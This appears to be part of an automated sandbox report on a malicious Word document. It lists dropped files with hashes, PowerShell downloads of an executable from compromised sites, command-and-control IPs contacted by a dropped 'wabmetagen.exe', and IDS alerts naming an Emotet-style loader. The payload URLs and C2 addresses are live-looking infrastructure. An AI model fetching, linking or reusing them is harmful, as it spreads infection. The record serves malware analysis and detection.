3856 | 873.exe | C:\Users\admin\AppData\Local\wabmetagen\wabmetagen.exe | executable | |
MD5:33F321CF092CF8E1E27558BDD1E71FB8 | SHA256:5AF77B93FD2E80082633BDDF2385DA567EBAE175736BD1EDB4888846B99376BB | |||
2944 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\VBE\MSForms.exd | tlb | |
MD5:7D7181CFA0E7285ADF1AF9C2BFB2ABD9 | SHA256:0F5EC33E85B5619C5E7C802F5BA83671BED5E5DC231501C89D344817066A69AA | |||
2944 | WINWORD.EXE | C:\Users\admin\AppData\Roaming\Microsoft\Templates\~$Normal.dotm | pgc | |
MD5:562FE999368B94AB908D9AA32036F8F0 | SHA256:D8AA20CC6D16C82CDE094ECFFA046902F9E2298F557272AA4FD9DAB504034E3C | |||
3064 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms~RF20f2ef.TMP | binary | |
MD5:2BCAD5DA21CB41B727ABDE7D6B6990B8 | SHA256:AB1397E3A31059329829AE2164787589945B1459ED2E1B7328E86ED497A6F9F3 | |||
3064 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms | binary | |
MD5:2BCAD5DA21CB41B727ABDE7D6B6990B8 | SHA256:AB1397E3A31059329829AE2164787589945B1459ED2E1B7328E86ED497A6F9F3 | |||
2944 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\~$STELLDETAILS_eDATEI.doc | pgc | |
MD5:A759DC460B990171BE70709F211C862E | SHA256:FAD31F9BA7C958829E5F72123C9D0AA4BDEBE2A63395715ECDDE8462121A8712 |
PID | Process | Method | HTTP Code | IP | URL | CN | Type | Size | Reputation |
---|---|---|---|---|---|---|---|---|---|
3064 | powershell.exe | GET | 200 | 216.15.213.103:80 | http://blamdigital.com/cgi-sys/suspendedpage.cgi | US | html | 7.41 Kb | malicious |
3064 | powershell.exe | GET | 404 | 164.138.208.39:80 | http://jumesamedina.com/FKcXltRa | ES | html | 325 b | malicious |
3740 | wabmetagen.exe | GET | — | 200.125.113.60:8080 | http://200.125.113.60:8080/ | AR | — | — | malicious |
3064 | powershell.exe | GET | 302 | 216.15.213.103:80 | http://blamdigital.com/dc2cDi0 | US | html | 232 b | malicious |
3740 | wabmetagen.exe | GET | — | 200.68.61.242:8080 | http://200.68.61.242:8080/ | CL | — | — | malicious |
3064 | powershell.exe | GET | 503 | 213.202.100.12:80 | http://documentation-contest.com/APy2PMrfdo | HR | html | 398 b | malicious |
3064 | powershell.exe | GET | 200 | 94.73.146.142:80 | http://enerjiiklimlendirme.com/wp-admin/css/ZyOT6ltmnL/ | TR | executable | 192 Kb | malicious |
3740 | wabmetagen.exe | GET | 200 | 189.250.153.215:443 | http://189.250.153.215:443/ | MX | binary | 132 b | malicious |
3064 | powershell.exe | GET | 301 | 94.73.146.142:80 | http://enerjiiklimlendirme.com/wp-admin/css/ZyOT6ltmnL | TR | html | 617 b | malicious |
3064 | powershell.exe | GET | 404 | 45.252.248.16:80 | http://mariposaplus.com/idyudJzd | VN | html | 1.12 Kb | malicious |
PID | Process | IP | Domain | ASN | CN | Reputation |
---|---|---|---|---|---|---|
3064 | powershell.exe | 164.138.208.39:80 | jumesamedina.com | Cyberneticos Hosting SL | ES | malicious |
3064 | powershell.exe | 45.252.248.16:80 | mariposaplus.com | AZDIGI Corporation | VN | malicious |
3064 | powershell.exe | 216.15.213.103:80 | blamdigital.com | CYBERCON, INC. | US | malicious |
3064 | powershell.exe | 213.202.100.12:80 | documentation-contest.com | ISKON INTERNET d.d. za informatiku i telekomunikacije | HR | malicious |
3064 | powershell.exe | 94.73.146.142:80 | enerjiiklimlendirme.com | Cizgi Telekomunikasyon Anonim Sirketi | TR | malicious |
3740 | wabmetagen.exe | 190.216.238.62:22 | — | Level 3 Communications, Inc. | VE | malicious |
3740 | wabmetagen.exe | 200.125.113.60:8080 | — | Telecentro S.A. | AR | malicious |
3740 | wabmetagen.exe | 189.250.153.215:443 | — | Uninet S.A. de C.V. | MX | malicious |
3740 | wabmetagen.exe | 75.159.115.228:990 | — | TELUS Communications Inc. | CA | malicious |
3740 | wabmetagen.exe | 200.68.61.242:8080 | — | CTC. CORP S.A. (TELEFONICA EMPRESAS) | CL | malicious |
Domain | IP | Reputation |
---|---|---|
jumesamedina.com |
| malicious |
mariposaplus.com |
| malicious |
blamdigital.com |
| malicious |
documentation-contest.com |
| malicious |
enerjiiklimlendirme.com |
| malicious |
dns.msftncsi.com |
| shared |
PID | Process | Class | Message |
---|---|---|---|
3064 | powershell.exe | A Network Trojan was detected | SC TROJAN_DOWNLOADER Suspicious loader with tiny header |
3064 | powershell.exe | A Network Trojan was detected | SC TROJAN_DOWNLOADER Trojan-Downloader Emoloader Win32 |
3064 | powershell.exe | A Network Trojan was detected | SC TROJAN_DOWNLOADER Suspicious loader with tiny header |
3064 | powershell.exe | A Network Trojan was detected | SC TROJAN_DOWNLOADER Trojan-Downloader Emoloader Win32 |
3064 | powershell.exe | A Network Trojan was detected | SC TROJAN_DOWNLOADER Suspicious loader with tiny header |
3064 | powershell.exe | A Network Trojan was detected | SC TROJAN_DOWNLOADER Trojan-Downloader Emoloader Win32 |
3064 | powershell.exe | A Network Trojan was detected | SC TROJAN_DOWNLOADER Suspicious redirect to 'suspendedpage.cgi' |
3064 | powershell.exe | A Network Trojan was detected | SC TROJAN_DOWNLOADER Suspicious loader with tiny header |
3064 | powershell.exe | A Network Trojan was detected | SC TROJAN_DOWNLOADER Trojan-Downloader Emoloader Win32 |
3064 | powershell.exe | Potential Corporate Privacy Violation | ET POLICY PE EXE or DLL Windows file download HTTP |